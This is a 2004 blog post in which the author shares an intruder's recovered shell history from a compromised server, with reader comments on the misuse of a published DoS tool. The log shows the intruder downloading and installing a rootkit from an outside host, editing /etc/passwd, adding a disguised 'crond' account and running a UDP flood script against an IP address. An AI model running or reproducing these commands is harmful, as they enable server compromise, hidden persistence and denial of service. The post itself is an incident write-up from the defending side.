Monday, November 29, 2004

 

Cracker footsteps

Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.


cd /dev
history
wget http://www.cascorosso.com/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
w
ls
exit
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
exit
id
wget perl udp.pl 200.103.191.2 29 2000
wget www.packetstormsecurity.org/DoS/udp.pl
perl udp.pl 200.103.191.2 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
ls
cd vhosts/
ls
pwd
less kaotic.pl
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages


Notice that kaotic.pl file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.

Comments:
That's pretty nasty, using a security organization's own distribution of a denial of service tool (carefully labeled "for testing only") to commit a DoS attack.

Hmm -- I'm trying to think about whether software like that could be distributed with a license mechanism in place so it would require users to leave a trail? Of course if there were a source distribution it would mean someone could remove the license code. That would slow down the cookbook kids but only until a grownup released an unauthorized distribution with the crippleware disabled. Which I'm sure is why the good guys haven't bothered to do it. That plus the fact that some good guys wouldn't want to advertise their security testing, either. Oh, well.
 
:)

It might be constructive to go after those individual sources, but then again that's a whole nother obsession.

Pretty interesting to see the guy's footsteps, anyway.
 
Post a Comment

<< Home

This page is powered by Blogger. Isn't yours?